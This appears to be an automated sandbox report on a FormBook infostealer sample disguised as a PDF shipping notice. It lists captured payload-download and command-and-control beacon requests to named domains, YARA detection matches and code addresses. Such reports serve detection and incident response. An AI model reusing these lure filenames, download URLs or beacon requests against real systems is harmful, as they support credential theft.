Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=16igyruBeyi1SLH2lfqbjS2ggty9bFGFC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nqfdtgt678la5ha3g2tbhed40e9h4e57/1637762850000/13904828925096904893/*/16igyruBeyi1SLH2lfqbjS2ggty9bFGFC?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-14-5s-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=PTZX9bbDrHz+cSGvcymGk0mts24461Z1qQ1nyKxozOrcJ62jRcnhMEjPJVIjYEdLVzgY&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.izivente.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=djAV39Fd+2tTaJZ0vMg9wx3f2dAzn5uoNnRL0R1SzoIuCwqtHRucI/njP/LN+anlykG6&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.musee-radix-hairsalon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=sqInqd/J1oF05xIRIYy6fIocxGbhQvf/UJ8WsTvvwcutrQRehAYuBiNZHMXnLC/ELIDP&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.teslafreesuperchargermiles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=SHCw80AJpwYBr9Gcy19d9t3wNH3OULHDJ3WoL9xOYwR6hbrNjBBxIJP5Ay3SVk+aC6rM&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.mvsteals.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=mH/60k+8QaINko6jE2QpZl5PE74OV+HVH/ClSiWHQSmVZS7BQfRqR+Cg+8qmWPEHLuT3&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.thaicharuen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=UFnETU8dieTu408infxPFcIZ9A51JABruIfjxtzTo70f1rUHWxHKXlzNhsAQN9Kxpi4c&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.morningstarapparel.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=09o28MjQy1cZQ5Pjj+CLcbQvMAiWJGV2Uxg7+ScaYTXEQUafs3S8SGgaduHkLU6DHZH5&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.soarlikeaneagle.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=mbzqDKJ3zGVZXRXzBR45Cgdnnesr2+nRJSwniRIMGUaPxNPQA+ji5LfWApDcm/CqO18J&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.evaccines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=NBR0aPdzKjxBJ/qIBF///end99Hz3MSBKbZXqSBgBb5XrtkET9he0lXIERUBepCdWUFS&kTGXE2=5jpDxBr8jNJ0VnGP HTTP/1.1Host: www.celsb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=d8/OqiJyMkDaGTNTMgoxgiTtJv1BTsaVDDjuqFtpNub02Pcaaru29SvOabQgh8wWKZWy&hXeT=Wxlp HTTP/1.1Host: www.4mtechmachines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /s3f1/?0v=F/pbsBegFO7o3fLKo/FzEC9ZwTRXzaIgUSgpsvNThmOurZQxU5rRi5MGW6g3EwPdsbP6&hXeT=Wxlp HTTP/1.1Host: www.hara.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown	HTTPS traffic detected: 142.250.185.110:443 -> 192.168.11.20:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49806 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample	Static PE information: Filename: Arrival Notice, CIA Awb Inv Form.pdf.exe
Source: initial sample	Static PE information: Filename: Arrival Notice, CIA Awb Inv Form.pdf.exe

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: Arrival Notice, CIA Awb Inv Form.pdf.exe

Static file information: Suspicious name

Source: Arrival Notice, CIA Awb Inv Form.pdf.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.22694456011.000000000A598000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.26929044585.00000000034CF000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000008.00000002.26923234058.0000000002962000.00000004.00000020.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.22826427639.000000001E760000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.26922800429.0000000002800000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.26924489179.0000000002D00000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.26924755438.0000000002D30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.22745903057.000000000A598000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.22815363833.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE

Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_0040430D	1_2_0040430D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B6CC3A	1_2_02B6CC3A
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B6CF85	1_2_02B6CF85
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B72FF6	1_2_02B72FF6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B6C7E5	1_2_02B6C7E5
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B70C8F	1_2_02B70C8F
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B718FC	1_2_02B718FC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B715AA	1_2_02B715AA
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B6D199	1_2_02B6D199
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B6FFF2	1_2_02B6FFF2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 1_2_02B6DB02	1_2_02B6DB02
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB0EAD	6_2_1EAB0EAD
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA01EB2	6_2_1EA01EB2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F2EE8	6_2_1E9F2EE8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB9ED2	6_2_1EAB9ED2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0E6D	6_2_1EAA0E6D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA42E48	6_2_1EA42E48
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA20E50	6_2_1EA20E50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABEFBF	6_2_1EABEFBF
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA06FE0	6_2_1EA06FE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB1FC6	6_2_1EAB1FC6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0CF00	6_2_1EA0CF00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABFF63	6_2_1EABFF63
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA99C98	6_2_1EA99C98
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA87CE8	6_2_1EA87CE8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1FCE0	6_2_1EA1FCE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EACACEB	6_2_1EACACEB
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA18CDF	6_2_1EA18CDF
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0AC20	6_2_1EA0AC20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F0C12	6_2_1E9F0C12
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB6C69	6_2_1EAB6C69
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABEC60	6_2_1EABEC60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAAEC4C	6_2_1EAAEC4C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA12DB0	6_2_1EA12DB0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA9FDF4	6_2_1EA9FDF4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA09DD0	6_2_1EA09DD0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABFD27	6_2_1EABFD27
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9FAD00	6_2_1E9FAD00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00D69	6_2_1EA00D69
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB7D4C	6_2_1EAB7D4C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1FAA0	6_2_1EA1FAA0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABFA89	6_2_1EABFA89
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABCA13	6_2_1EABCA13
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABEA5B	6_2_1EABEA5B
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA74BC0	6_2_1EA74BC0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABFB2E	6_2_1EABFB2E
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00B10	6_2_1EA00B10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA3DB19	6_2_1EA3DB19
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA798B2	6_2_1EA798B2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA16882	6_2_1EA16882
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB78F3	6_2_1EAB78F3
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA028C0	6_2_1EA028C0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB18DA	6_2_1EAB18DA
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0835	6_2_1EAA0835
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03800	6_2_1EA03800
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2E810	6_2_1EA2E810
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA09870	6_2_1EA09870
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1B870	6_2_1EA1B870
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA75870	6_2_1EA75870
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABF872	6_2_1EABF872
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E6868	6_2_1E9E6868
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABE9A6	6_2_1EABE9A6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9FE9A0	6_2_1E9FE9A0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA459C0	6_2_1EA459C0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00680	6_2_1EA00680
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA736EC	6_2_1EA736EC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABF6F6	6_2_1EABF6F6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABA6C0	6_2_1EABA6C0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9FC6E0	6_2_1E9FC6E0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA9D62C	6_2_1EA9D62C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1C600	6_2_1EA1C600
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA24670	6_2_1EA24670
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAAD646	6_2_1EAAD646
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA02760	6_2_1EA02760
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0A760	6_2_1EA0A760
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB6757	6_2_1EAB6757
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6D480	6_2_1EA6D480
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA00445	6_2_1EA00445
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABF5C9	6_2_1EABF5C9
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB75C6	6_2_1EAB75C6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EACA526	6_2_1EACA526
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9ED2EC	6_2_1E9ED2EC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB124C	6_2_1EAB124C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F1380	6_2_1E9F1380
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABF330	6_2_1EABF330
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0E310	6_2_1EA0E310
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA3508C	6_2_1EA3508C
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F00A0	6_2_1E9F00A0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB70F1	6_2_1EAB70F1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0B0D0	6_2_1EA0B0D0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAAE076	6_2_1EAAE076
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1B1E0	6_2_1EA1B1E0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA051C0	6_2_1EA051C0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EF113	6_2_1E9EF113
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA9D130	6_2_1EA9D130
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAC010E	6_2_1EAC010E
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA4717A	6_2_1EA4717A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FAD2EC	8_2_02FAD2EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0307F330	8_2_0307F330
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0307124C	8_2_0307124C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FB1380	8_2_02FB1380
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FCE310	8_2_02FCE310
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0308010E	8_2_0308010E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FCB0D0	8_2_02FCB0D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0305D130	8_2_0305D130
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FB00A0	8_2_02FB00A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FF508C	8_2_02FF508C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_0300717A	8_2_0300717A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 8_2_02FDB1E0	8_2_02FDB1E0
